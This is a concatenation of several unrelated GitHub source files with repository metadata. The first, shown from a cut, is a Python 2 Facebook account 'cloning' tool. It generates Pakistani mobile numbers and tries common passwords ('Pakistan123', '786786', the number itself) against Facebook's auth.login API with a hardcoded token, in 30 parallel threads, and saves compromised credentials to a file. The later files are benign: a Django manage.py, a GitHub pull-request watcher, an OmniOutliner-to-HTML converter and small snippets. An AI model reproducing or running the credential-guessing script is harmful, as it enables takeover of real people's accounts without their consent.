os.system('xdg-open https://www.facebook.com/zulfiqar.baloch.9047506')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.facebook.com/zulfiqar.baloch.9047506')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;91mSTART ( \033[1;92m NOW)"
time.sleep(0.05)
print "\033[1;95m[2]\x1b[1;94mUPDATE (9.0)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;91m[1] START CLONING'
time.sleep(0.10)
print '\x1b[1;92m[2] Zulfiqar Baloch'
time.sleep(0.10)
print '\x1b[1;93m[3] BALOCH BADSHAH'
time.sleep(0.10)
print '\x1b[1;93m[4] BOLANI'
time.sleep(0.10)
print '\x1b[1;92m[5] CLONING ERROR'
time.sleep(0.10)
print '\x1b[1;91m[6] ZULFIQAR BALOCH FACEBOOK'
time.sleep(0.10)
print '\x1b[1;93m[0] back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;97mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter any Pakistan Mobile code Number"+'\n'
print '\x1b[1;91mEnter any code 01 to 49'
print '\x1b[1;92mtelenor.\x1b[1;91mjazz.\x1b[1;93mzong.\x1b[1;95mwarid.UFUNE'
try:
c = raw_input("\033[1;97mCHOOSE : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;94m-'
xxx = str(len(id))
jalan ('\033[1;91m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;93mWait A While \x1b[1;94mStart Cracking...")
jalan ("\033[1;94mTo Stop Process Press Ctrl+z")
print 50* '\033[1;97m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;95m(DON) ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;95mBOLANIMAFIA24HORAS) ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m(OPEN) ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;93mBOLANI CP) ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;93mcp) ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="00786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m\x1b[1;93m( chikpont) ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m\x1b[1;94m(7deys) ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
███
──────────███║║║║║║║███
─────────█║║║║║║║║║║║║║█
────────█║║║║███████║║║║█
───────█║║║║██─────██║║║║█
──────█║║║║██───────██║║║║█
─────█║║║║██─────────██║║║║█
─────█║║║██───────────██║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
────███████───────────███████
───██║║║║║║██────────██║║║║║██
──██║║║║║║║║██──────██║║║║║║║██
─██║║║║║║║║║║██───██║║║║║║║║║║██
██║║║║║║║║║║║║█████║║║║║║║║║║║║██
█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█
█║║║║║║║║║║║║║█████║║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
██║║║║║║║║║║║█░░░░░█║║║║║║║║║║║██
██║║║║║║║║║║║║█░░░█║║║║║║║║║║║║██
─██║║║║║║║║║║║█░░░█║║║║║║║║║║║██
──██║║║║║║║║║║█░░░█║║║║║║║║║║██
───██║║║║║║║║║█░░░█║║║║║║║║║██
────██║║║║║║║║█████║║║║║║║║██
─────██║║║║║║║║███║║║║║║║║██
──────██║║║║║║║║║║║║║║║║║██
───────██║║║║║║║║║║║║║║║██
────────██║║║║║║║║║║║║║██
─────────██║║║║║║║║║║║██
──────────██║║║║║║║║║██
───────────██║║║║║║║██
────────────██║║║║║██
─────────────██║║║██
──────────────██║██
───────────────███
───────────────────────▄██▄▄██▄
──────────────────────██████████
──────────────────────▀████████▀
────────────────────────▀████▀
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
──────────────────────▄▄▄████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▄█████▀
\033[1;96mThanks me later
\033[1;95mFb\033[1;97mBolani
\033[1;95m033[1;97m"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
balochmafia.noreply@github.com
|
4b9309359ecad918d337ceb9d0e09b3cb68226d5
|
b1b29337bd65eba2f0b1c1e5c16768b4f27c67b5
|
/python/python.py
|
0698b88cf286ce89e68338f6010e12686e18ed57
|
[] |
no_license
|
mostofa22397/mostofa22397.github.io
|
e90737dd098e1677aeb4b38be96cd0b2eecc87c0
|
2d2feb052e0510b69ea63bf04679da9555f7d2a5
|
refs/heads/master
| 2022-12-12T04:36:40.390189
| 2020-08-16T03:53:12
| 2020-08-16T03:53:12
| 260,180,670
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
import pyttsx3
friend = pyttsx3.init()
friend.say('I can speak now. Fuck you bitch')
friend.runAndWait()
|
[
"mostofa22397@gamil.com"
] |
mostofa22397@gamil.com
|
5c3a89595dbc6632bc443fd0a07c473e032cf35b
|
05f4b73f8fab3a7b995bf2bd28b9f7eeba89d9e7
|
/1_20210120.py
|
a9e013731e61394a8b5abf764c7f5bfefd63f843
|
[] |
no_license
|
AlgorithmOnline/jaeeun
|
c7ee9504dd8109a8e0154e0ce514f35796ba368c
|
65dfee579d7a75bcc240a190e7edff10d285d113
|
refs/heads/master
| 2023-04-20T02:52:12.673218
| 2021-05-07T13:56:05
| 2021-05-07T13:56:05
| 286,736,284
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
#백준 실버5 1010
T = int(input())
ass=[1,1]
def fact(a):
if len(ass)-1<a:
for i in range(len(ass), a+1):
ass.append(ass[-1]*len(ass))
return ass[a]
for _ in range(T):
N, M = map(int, input().split())
print(round(fact(M)/(fact(M-N)*fact(N))))
|
[
"rha3122@naver.com"
] |
rha3122@naver.com
|
98b5c5eb7645a15cdc0458ffd989000b617d0303
|
babc797b560ff38c7cd5a8da25498e5461173e3f
|
/manage.py
|
53478feab5f3e2efc9de36bc9fe403f09b777dd6
|
[] |
no_license
|
vivalavida20/overwatch_patch_notes
|
cdbb3b8e13340b389702df6a87f1ab2dea7b3f24
|
c419eb917e3268b9a066df72d0d67a4952a739cd
|
refs/heads/master
| 2020-05-22T22:34:03.634271
| 2017-03-30T22:36:35
| 2017-03-30T22:36:35
| 84,730,828
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "patch_notes.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"vivalavida2051@gmail.com"
] |
vivalavida2051@gmail.com
|
52b91de13800f3a0da47c3b25bba32f232274005
|
f9a577d4f522411c37c976197d5dcc3800904dc5
|
/cryptobot/currency/__init__.py
|
dddab8c6ac239a986f759704dc5bfef6403b2047
|
[] |
no_license
|
Ferdellans/arbitrage
|
e223ae0ff50c58d21cf741c9332ba00ba2196271
|
115ca544ed61eecbc7442405e22bdd33be0bf931
|
refs/heads/master
| 2022-12-15T13:14:14.335480
| 2018-05-10T07:36:11
| 2018-05-10T07:36:11
| 132,863,902
| 1
| 0
| null | 2022-12-08T00:43:54
| 2018-05-10T07:22:17
|
Python
|
UTF-8
|
Python
| false
| false
| 250
|
py
|
from cryptobot.common.manager import BaseManager
class BaseCurrency:
@property
def title(self):
raise NotImplemented
symbol = title
class CurrencyManager(BaseManager):
CACHE = {}
import_mask = "cryptobot.currency.{}"
|
[
"yevhenii.luchaninov@gmail.com"
] |
yevhenii.luchaninov@gmail.com
|
6be792eac7e706782893db069264bc9eac560886
|
e09c1040c8a96567966984bc1a4e04cd9e39bf0c
|
/watcher.py
|
2f313f2612ba6a9ba47f3a2ab08967e3670b1016
|
[] |
no_license
|
ee08b397/github-watcher
|
910b736076085536e97eb08073be18a5466c60c7
|
e688f30b64de96a07ea2bb268122d71b5c553184
|
refs/heads/master
| 2021-07-23T17:01:48.987193
| 2017-11-03T23:00:42
| 2017-11-03T23:00:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,855
|
py
|
import json
import subprocess
import os.path
import time
import sys
import unidiff
import requests
from pync import Notifier
import yaml
GITHUB_API = 'https://api.github.com'
WATCHER_ALERT_LOG = '/tmp/watcher_alert.log'
try:
with open(os.path.join(os.path.expanduser('~'), '.github'), 'rb') as github_auth_fp:
oauth_token = github_auth_fp.read().strip()
except IOError as e:
print "You must store your github access token at ~/.github."
print " 1. Go to github.braintreeps.com and"
print " 2. click your avatar in the top right then"
print " 3. click Settings then"
print " 4. click Personal access tokens on the left then"
print " 5. Generate access token then"
print " 6. click repo and user permissions checkboxes. next"
print " 7. click Generate Token. "
print " 8. SAVE THAT. copy/paste to ~/.github you will never see it again."
sys.exit(1)
try:
with open(os.path.join(os.path.expanduser('~'), '.watch-github.yml'), 'rb') as config:
CONFIG = yaml.load(config.read())
except IOError as e:
print "You must include a configuration of what to watch at ~/.watch-github.yml"
sys.exit(1)
headers = {'Authorization': 'token {}'.format(oauth_token)}
def get_open_pull_requests(user, repo):
resource = GITHUB_API + '/repos/{user}/{repo}/pulls?state=open'.format(
**{'user': user, 'repo': repo})
return requests.get(resource, headers=headers).json()
def get_diff(pull_request):
diff_url = pull_request.get('diff_url')
return requests.get(diff_url, headers=headers).text
def get_watched_file(user, repo, hunk_path):
paths = CONFIG.get(user, {}).get(repo, [])
if not paths:
return None
for path in paths:
if hunk_path == path:
return path
return None
def get_watched_directory(user, repo, hunk_path):
paths = CONFIG.get(user, {}).get(repo, [])
if not paths:
return None
for path in paths:
if hunk_path.startswith(path):
return path
return None
def alert(user, repo, file, range, pr_link):
msg = 'Found a PR effecting {file} {range}'.format(
file=file,
range=str(range))
subprocess.call('say ' + msg, shell=True)
Notifier.notify(
msg,
title='Github Watcher',
open=pr_link)
sys.stdout.write('\a')
sys.stdout.flush()
def are_watched_lines(watchpaths, filepath, start, end):
if filepath not in watchpaths:
return False
for watched_start, watched_end in watchpaths[filepath]:
if watched_start < start < watched_end:
return True
if watched_start < end < watched_end:
return True
return False
def alert_if_watched_changes(user, repo, patched_file, link, source_or_target='source'):
filepath = getattr(patched_file, source_or_target + '_file')
if filepath.startswith('a/') or filepath.startswith('b/'):
filepath = filepath[2:]
watched_directory = get_watched_directory(user, repo, filepath)
if watched_directory and not already_alerted(link):
alert(user, repo, watched_directory, '', link)
mark_as_alerted(link)
return True
watched_file = get_watched_file(user, repo, filepath)
if watched_file:
for hunk in patched_file:
start = getattr(hunk, source_or_target + '_start')
offset = getattr(hunk, source_or_target + '_length')
end = start + offset
if are_watched_lines(watchpaths, filepath, start, end):
if not already_alerted(link):
alert(user, repo, watched_file, (start, end), link)
mark_as_alerted(link)
return True
return False
def mark_as_alerted(pr_link):
with open(WATCHER_ALERT_LOG, 'a+') as fp:
fp.write(pr_link + '\n')
def already_alerted(pr_link):
try:
with open(WATCHER_ALERT_LOG, 'rb') as fp:
alerted = fp.readlines()
for line in alerted:
if pr_link in line:
return True
except IOError as e:
pass
return False
if __name__ == '__main__':
while True:
for user, repo_watchpaths in CONFIG.items():
for repo, watchpaths in repo_watchpaths.items():
open_prs = get_open_pull_requests(user, repo)
for open_pr in open_prs:
link = open_pr.get('_links', {}).get('html', {}).get('href', '')
patchset = unidiff.PatchSet.from_string(get_diff(open_pr))
for patched_file in patchset:
if alert_if_watched_changes(user, repo, patched_file, link, 'source'):
continue
alert_if_watched_changes(user, repo, patched_file, link, 'target')
time.sleep(60 * 10) # 10 minutes
|
[
"andrew.kelleher@venmo.com"
] |
andrew.kelleher@venmo.com
|
86014a65c1da280a31e3d5726715e8c400fe29ea
|
1d2422c7187468157d0582351a83bf598b99a47e
|
/OOblogger.py
|
07cd3f62173947210309f797c91d03770b681a45
|
[] |
no_license
|
tcc/clippings
|
0571cceaff79f96113cb2c051c00d67f80d44d9b
|
148dffe399102d59a94c1b2844eebc9d88a59ada
|
refs/heads/master
| 2021-01-10T20:44:28.810980
| 2011-12-10T16:09:35
| 2011-12-10T16:09:35
| 176,566
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,283
|
py
|
# -*- coding: UTF-8 -*-
#
# Copyright 2009 T.C. Chou, All rights reserved.
#
# converting OO3 to fit html block of blogger
#
#
# Copyright 2008 Omni Development, Inc. All rights reserved.
#
# Omni Source Code software is available from the Omni Group on their
# web site at www.omnigroup.com.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# Any original copyright notices and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# $Header: svn+ssh://source.omnigroup.com/Source/svn/Omni/trunk/Staff/wvh/Helpify/OOhelpify.py 106832 2008-11-15 02:21:21Z wvh $
# informally-assigned version number: 1.2
import sys, os, shutil, re, commands, codecs
from xml.dom.minidom import parseString
reload(sys)
sys.setdefaultencoding('utf-8')
TEXT_NODE = 3
IMAGE_PATH = "" # "HelpImages/"
COMPANY_URL = "www.example.com"
bookTitle = ""
attachments = {}
links = []
anchors = []
doNavi = True
outputPath = ""
tab_spc = 4
styles = []
styles_level_start = 2
span_levels = ['']
pre_style = "background-color: #EEEEEE; border: #444444 1px solid; font-size: 80%"
def scrubAnchor(text):
anchor = re.sub('<span class="Drop">.*?</span>', '', text)
anchor = re.sub('\&.*?\;', '', anchor)
anchor = re.sub('<.*?>', '', anchor)
anchor = re.sub('\W', '', anchor)
return anchor
def fileHeader(tehFile, title, robots="", isTop=False, url="", description=""):
"""Print to a file the stuff we need at the top of an HTML document."""
title = re.sub('<.*?>', '', title).strip()
topString = ""
if isTop:
topString = """<meta name="AppleTitle" content="%(title)s">
""" % {
'title': title
}
print >> tehFile, """<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>%(title)s</title>
%(topString)s
%(robots)s
<meta name="description" content="%(description)s">
<link rel="stylesheet" href="help.css" type="text/css">
</head>
<body>""" % {
'title': title,
'topString': topString,
'robots': robots,
'description': description
}
def fileFooter(tehFile):
"""Print to a file the stuff we need at the bottom of an HTML document."""
print >> tehFile, """
</body>
</html>"""
def fileFrames(tehFile, title, anchor):
"""Write to a file the frameset to hold a table of contents."""
print >> tehFile, """<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta name="robots" content="noindex">
<title>%(title)s</title>
<link href="help.css" rel="stylesheet" media="all">
</head>
<frameset cols="170,*">
<frame name="left" noresize src="%(anchor)s.html">
<frame name="right" noresize src="empty.html">
<noframes>
No frames.
</noframes>
</frameset>
</html>
""" % {
'title': title,
'anchor': anchor
}
def digItem(tehItem, level, inheritedStyle=[], destReached=False):
output = ''
applicableStyles = []
divStyles = []
itemStyles = findStyles(tehItem)
while len(itemStyles) < 2:
itemStyles.append([])
if itemStyles[0]: applicableStyles.extend(itemStyles[0])
if inheritedStyle: applicableStyles.extend(inheritedStyle)
possibleDivStyles = ['Pro', 'Box', 'Destination', 'Anchor', 'Pre']
for oneStyle in possibleDivStyles:
if oneStyle in applicableStyles:
divStyles.append(oneStyle)
applicableStyles.remove(oneStyle)
#if not len(applicableStyles): applicableStyles = ['plain']
#print applicableStyles
preness = None
if 'Pre' in divStyles:
preness = 'Pre'
text = itemText(tehItem, preness)
anchor = ""
if destReached: #we're already at the destination; we're just filling in the text of the page.
if 'Anchor' in divStyles:
output += """<a name="%s"></a>""" % (scrubAnchor(itemText(tehItem)).lower())
if scrubAnchor(itemText(tehItem)).lower() not in anchors:
anchors.append(scrubAnchor(itemText(tehItem)).lower())
else:
output += " " + " "*level + '<div class="item %s">' % (' '.join(divStyles))
if text:
output += '<span class="%(classes)s">%(text)s</span>' % {
'classes': ' '.join(applicableStyles),
'text': text
}
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subText = digItem(itemNode, level+1, itemStyles[1], destReached=True)
output += subText['text']
output += " " + " "*level + "</div>\n"
if 'Pre' in divStyles:
output = "<pre>" + output + "</pre>"
text = output #send back all of the text of the contained nodes, formatted properly
else: #we're not at the destination yet; we need to make a sub-page for this item.
anchor = scrubAnchor(text)
if "Destination" in divStyles:
destReached = True
newFileName = anchor + '.html'
level2File = open(outputPath + '/' + newFileName, 'w')
roboString = """<meta name="robots" content="noindex">"""
if destReached:
roboString = ""
elif level == 2:
divStyles.append("toc-left")
else:
divStyles.append("toc-right")
abstract = ""
# turn the note into an abstract; suppress this if your notes are still notes :D
for noteNode in findSubNodes(tehItem, 'note'):
for textNode in findSubNodes(noteNode, 'text'):
for pNode in findSubNodes(textNode, 'p'):
for runNode in findSubNodes(pNode, 'run'):
for litNode in findSubNodes(runNode, 'lit'):
abstract += litNode.toxml('utf-8')
abstract = re.sub('<.*?>', '', abstract).strip()
fileHeader(level2File, text, roboString, isTop=False, url=newFileName, description=abstract)
print >> level2File, """
<div class="%(classes)s">
<h2>%(text)s</h2>
""" % {
'classes': ' '.join(divStyles),
'text': text
}
subTextList = [] # time to look at all the children of this node
for childrenNode in findSubNodes(tehItem, 'children'):
for itemNode in findSubNodes(childrenNode, 'item'):
subTextList.append(digItem(itemNode, level+1, itemStyles[1], destReached))
#print subTextList
if destReached:
for subText in subTextList:
print >> level2File, subText['text']
else:
for subText in subTextList:
target = "_top"
#if level >= 2 and not subText['destination']:
# target = "right"
frameness = ''
print >> level2File, '<p><a href="%(anchor)s.html" target="%(target)s">%(text)s</a></p>' % {
'anchor': subText['anchor'] + frameness,
'target': target,
'text': subText['text']
}
print >> level2File, """
</div>
"""
#make a navi thingy; suppress this stuff if you are going to index, then emit the help again with the links in it
if doNavi:
prevAnchor = ""
prevTitle = ""
if tehItem.previousSibling and tehItem.previousSibling.previousSibling:
prevTitle = itemText(tehItem.previousSibling.previousSibling)
prevAnchor = scrubAnchor(prevTitle)
nextAnchor = ""
nextTitle = ""
if tehItem.nextSibling and tehItem.nextSibling.nextSibling:
nextTitle = itemText(tehItem.nextSibling.nextSibling)
nextAnchor = scrubAnchor(nextTitle)
print >> level2File, """
<div class="bottom-nav">
"""
if prevAnchor:
print >> level2File, """
<span class="left-nav"><a href="%(anchor)s.html">← %(title)s</a></span>
""" % {
'anchor': prevAnchor,
'title': prevTitle
}
if nextAnchor:
print >> level2File, """
<span class="right-nav"><a href="%(anchor)s.html">%(title)s →</a></span>
""" % {
'anchor': nextAnchor,
'title': nextTitle
}
# <a href="top.html">Top ↑</a>
print >> level2File, """
<br/>
</div>
"""
#end navi thingy
fileFooter(level2File)
result = {}
result['anchor'] = anchor
result['text'] = text
result['destination'] = destReached
return result
def findSubNodes(tehParent, kind): # get all child nodes with certain tagName
foundNodes = []
for subNode in tehParent.childNodes:
if (subNode.nodeType != TEXT_NODE) and (subNode.tagName == kind):
foundNodes.append(subNode)
return foundNodes
def itemText(tehItem, style=None): # find out the text of an item and send it back nicely formatted for html and css
constructedText = u''
for valuesNode in findSubNodes(tehItem, 'values'):
for textNode in findSubNodes(valuesNode, 'text'):
for pNode in findSubNodes(textNode, 'p'):
for runNode in findSubNodes(pNode, 'run'):
runStyles = []
linkage = False
for styleNode in findSubNodes(runNode, 'style'):
for inheritedStyleNode in findSubNodes(styleNode, 'inherited-style'):
runStyles.append(inheritedStyleNode.getAttribute('name'))
if "Link" in runStyles:
runStyles.remove("Link")
linkage = True
if runStyles:
constructedText += '<span class="%s">' % (" ".join(runStyles))
for litNode in findSubNodes(runNode, 'lit'):
for leaf in litNode.childNodes:
leafText = evaluateLeaf(leaf)
if linkage:
constructedText += """<a href="help:anchor='%(anchor)s' bookID='%(bookTitle)s'">%(text)s</a>""" % {
'anchor': scrubAnchor(leafText).lower(),
'bookTitle': bookTitle,
'text': leafText
}
if scrubAnchor(leafText).lower() not in links:
links.append(scrubAnchor(leafText).lower())
else:
constructedText += leafText
if runStyles:
constructedText += '</span>'
if style == 'Pre':
constructedText += '\n'
return constructedText
def evaluateLeaf(tehElement): # find out if an element is text or attachment and send back the appropriate html
if (tehElement.nodeType == TEXT_NODE):
htmlText = unicode(tehElement.toxml())
htmlText = re.sub("""“""", "“", htmlText)
htmlText = re.sub("""”""", "”", htmlText)
htmlText = re.sub("""‘""", "‘", htmlText)
htmlText = re.sub("""’""", "’", htmlText)
return htmlText
elif (tehElement.tagName == 'cell'):
if tehElement.getAttribute('href'):
return '<a href="%(href)s">%(name)s</a>' % {
'href': tehElement.getAttribute('href'),
'name': tehElement.getAttribute('name')
}
else:
fileName = attachments[tehElement.getAttribute('refid')]
fileName = re.sub("\d*__\S*?__", "", fileName)
extension = fileName.split('.')[-1].lower()
if extension == 'png' or extension == 'jpg' or extension == 'gif':
return '<img src="%s" class="inline-image">' % (IMAGE_PATH + fileName)
else:
return '<a href="%(fileName)s">%(name)s</a>' % {
'fileName': fileName,
'name': tehElement.getAttribute('name')
}
def findStyles(tehElement):
"""returns list of lists; inside list represents styles; outside list represents stack levels"""
itemStyles = []
for styleNode in findSubNodes(tehElement, 'style'):
nextStyle = []
for inheritedStyleNode in findSubNodes(styleNode, 'inherited-style'):
nextStyle.append(inheritedStyleNode.getAttribute('name'))
itemStyles.append(nextStyle)
return itemStyles
def findStyleValues(styleNode):
styleValues = {}
for styleVal in findSubNodes(styleNode, 'value'):
kk = styleVal.getAttribute('key')
vv=''
for leaf in styleVal.childNodes:
evv = evaluateLeaf(leaf)
if evv and evv.strip(): vv += evv
styleValues[kk] = vv
# print " %(key)s:%(val)s" % {'key':kk, 'val':vv}
named_styles = []
for styleVal in findSubNodes(styleNode, 'inherited-style'):
named_styles.append(styleVal.getAttribute('name'))
if len(named_styles)>0: styleValues['named_styles']=named_styles
return styleValues
def main():
if len(sys.argv) >= 2:
global outputPath
inputPath = sys.argv[1]
if inputPath[-1] == '/':
inputPath = inputPath[0:-1]
inputTitle = inputPath.split('/')[-1].split('.')[0]
outputPath = inputPath + '/../%s/' % (inputTitle)
if not os.access(outputPath, os.F_OK):
os.mkdir(outputPath)
if not os.access(outputPath + '/HelpImages', os.F_OK):
os.mkdir(outputPath + '/HelpImages')
if os.access(outputPath + '/../help.css', os.F_OK):
shutil.copyfile(outputPath + '/../help.css', outputPath + '/help.css')
if os.access(outputPath + '/../Icon.png', os.F_OK):
shutil.copyfile(outputPath + '/../Icon.png', outputPath + '/HelpImages/Icon.png')
print inputPath+"\n"
f = codecs.open(inputPath + '/contents.xml', 'r', 'utf-8')
xmlString = f.read().encode('utf-8')
tehTree = parseString(xmlString)
f.close()
docNode = tehTree.documentElement
#print tehTree.documentElement.tagName
#print tehTree.documentElement.getAttribute('crap')
rootNode = None
for oneNode in findSubNodes(docNode, 'root'):
rootNode = oneNode
style_attr_idx = 0
for styleElem in findSubNodes(rootNode, 'style'):
print "[%(idx)s]" % {'idx':style_attr_idx}
ss = findStyleValues(styleElem)
for i in ss:
print " %(key)s=%(val)s" % {'key':i, 'val':ss[i]}
style_attr_idx=style_attr_idx+1
for attachmentsNode in findSubNodes(docNode, 'attachments'):
for attachmentNode in findSubNodes(attachmentsNode, 'attachment'):
if attachmentNode.getAttribute('href'):
attachments[attachmentNode.getAttribute('id')] = attachmentNode.getAttribute('href')
if attachmentNode.getAttribute('href').find("__#$!@%!#__") == -1: ## get rid of INSANE outliner dupe files
shutil.copyfile((inputPath + '/' + attachmentNode.getAttribute('href')), outputPath + (IMAGE_PATH=="" and "" or '/'+IMAGE_PATH+'/') + attachmentNode.getAttribute('href'))
#This is where the files get generated. If we are adding navigation links, then generate the pages once without navi links for indexing, then once more with the navi links. If we are not adding navi, then just generate the pages once and index them.
naviIterations = [False]
if doNavi:
naviIterations = [False, True]
for oneNaviIteration in naviIterations:
for oneNode in rootNode.childNodes:
if (oneNode.nodeType != TEXT_NODE) and (oneNode.tagName == 'item'):
text = itemText(oneNode, 'title')
global bookTitle
bookTitle = text
tocFile = open(outputPath + '/top.html', 'w')
